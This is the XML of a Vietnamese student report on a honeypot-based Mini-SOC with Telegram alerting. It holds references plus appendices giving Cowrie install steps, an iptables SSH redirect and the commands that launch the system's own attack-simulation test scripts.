      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DA">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[10] P. Cichonski, T. Millar, T. Grance, and K. Scarfone, 'Computer Security Incident Handling Guide', NIST Special Publication 800-61 Revision 2, National Institute of Standards and Technology, 2012.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DB">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[11] AbuseIPDB Project, 'AbuseIPDB API v2 Documentation: Reporting and Checking Malicious IP Addresses', 2024. [Online]. Available: https://www.abuseipdb.com/api</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DC">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[12] J. Matherly, 'Complete Guide to Shodan: Collect More Data, Find More Devices, and More', Shodan LLC, 2016.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DD">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[13] VirusTotal, 'VirusTotal v3 REST API Reference for Threat Intelligence and Malware Analysis', Google Chronicle, 2024.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DE">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[14] Thinkst Canary, 'Canarytokens: Quick, Free, Painless Breadcrumbs to Detect Network Intruders', 2023. [Online]. Available: https://canarytokens.org/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DF">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[15] C. Kolias, G. Kambourakis, A. Stavrou, and J. Voas, 'DDoS in the IoT: Mirai and Other Botnets', IEEE Computer, vol. 50, no. 7, pp. 80-84, 2017.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E0">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[16] N. Provos and T. Holz, 'Virtual Honeypots: From Botnet Tracking to Intrusion Detection', Addison-Wesley Professional, 2007.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E1">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[17] G. F. Lyon, 'Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning', Insecure.Com LLC, 2009.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E2">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[18] K. Scarfone and P. Hoffman, 'Guidelines for Implementing the Advanced Encryption Standard (AES) and Secure Shell (SSH) in Enterprise Environments', NIST SP 800-123, 2018.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E3">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[19] Endlessh Project, 'Endlessh: An SSH Tarpit that slowly trickles an endless SSH banner', 2023. [Online]. Available: https://github.com/skeeto/endlessh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E4">
      <w:pPr>
        <w:spacing w:after="80" w:line="312" w:lineRule="auto"/>
        <w:ind w:left="400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[20] Telegram FZ-LLC, 'Telegram Bot API Manual for Webhooks and Interactive Inline Keyboards', 2024. [Online]. Available: https://core.telegram.org/bots/api</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E5">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambr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E6">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHỤ LỤC: HƯỚNG DẪN CÀI ĐẶT VÀ VẬN HÀNH HỆ THỐNG</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E7">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Phụ lục A: Hướng dẫn Triển khai Từng bước trên Máy chủ Linux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E8">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1: Cài đặt các gói phụ thuộc và Cowrie Honeypot trên máy chủ Ubuntu:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table24"/>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E9">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sudo apt-get update &amp;&amp; sudo apt-get install -y git python3-pip python3-virtualenv iptables</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">git clone https://github.com/cowrie/cowrie.git</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">cd cowrie</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">virtualenv --python=python3 cowrie-env</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">source cowrie-env/bin/activate</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">pip install --upgrade pip &amp;&amp; pip install -r requirements.txt</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">bin/cowrie start</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002EA">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Lệnh cài đặt và khởi động Cowrie Honeypot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002EB">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2: Chuyển hướng lưu lượng mạng SSH từ cổng 22 sang cổng bẫy 2222:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table25"/>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EC">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sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sudo iptables-save &gt; /etc/iptables/rules.v4</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002ED">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Cấu hình chuyển hướng cổng trên iptables</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002EE">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Bước 3: Khởi động Hệ sinh thái Active Defense &amp; Telegram SOAR Orchestrator:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table26"/>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EF">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cd /path/to/soc-honeynet-active-defense</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">python3 -m pip install -r requirements.txt</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">python3 main.py</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F0">
      <w:pPr>
        <w:spacing w:before="40" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Khởi chạy bộ điều phối trung tâm Mini-SOC Active Defense</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F1">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:spacing w:before="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phụ lục B: Kịch bản Kiểm thử Diễn tập Red Team Tự động</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="576"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="1e1e1e"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Để thực hiện bài kiểm tra diễn tập tự động chứng minh với Hội đồng Đánh giá, chạy kịch bản mô phỏng tấn công từ điển và thả mã độc:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table27"/>
        <w:tblW w:w="94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03"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9403"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f8f9fa" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F3">
            <w:pPr>
              <w:spacing w:after="80" w:before="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="212529"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 scripts/simulate_attack.py</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">python3 scripts/test_pipeline.py</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F4">
      <w:pPr>
        <w:spacing w:before="40" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lệnh thực thi diễn tập kiểm thử toàn diện các kịch bản</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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360" w:right="0" w:hanging="340"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId21" w:type="default"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
      <w:pgMar w:bottom="1134" w:top="1134" w:left="1418" w:right="1021" w:header="340" w:footer="3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ambria"/>
  <w:font w:name="Consola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147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7">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4320"/>
        <w:tab w:val="right" w:leader="none" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:after="284" w:lineRule="auto"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:tab/>
    </w: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b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:before="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>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2">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3">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4">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="140.0" w:type="dxa"/>
        <w:left w:w="180.0" w:type="dxa"/>
        <w:bottom w:w="140.0" w:type="dxa"/>
        <w:right w:w="180.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="Table5">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6">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7">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8">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9">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0">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="140.0" w:type="dxa"/>
        <w:left w:w="180.0" w:type="dxa"/>
        <w:bottom w:w="140.0" w:type="dxa"/>
        <w:right w:w="180.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="Table11">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2">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3">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4">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5">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6">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7">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8">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19">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20">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21">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22">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23">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="140.0" w:type="dxa"/>
        <w:left w:w="180.0" w:type="dxa"/>
        <w:bottom w:w="140.0" w:type="dxa"/>
        <w:right w:w="180.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="Table24">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25">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26">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="100.0" w:type="dxa"/>
        <w:left w:w="140.0" w:type="dxa"/>
        <w:bottom w:w="100.0" w:type="dxa"/>
        <w:right w:w="140.0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="Table27">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="100.0" w:type="dxa"/>
        <w:left w:w="140.0" w:type="dxa"/>
        <w:bottom w:w="100.0" w:type="dxa"/>
        <w:right w:w="1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image" Target="media/image11.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><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0.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.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12.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.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88ic1IpXDyPYihazUekv0kC0ZQ==">CgMxLjA4AHIhMWNkNnFqNXp0dEVnR29hbV9WUHpoOVpUVU9VdGt1SUZY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2024-11-12T01:22:00Z</dcterms:created>
  <dc:creator>Dau Hoang</dc:creator>
</cp:coreProperties>
</file>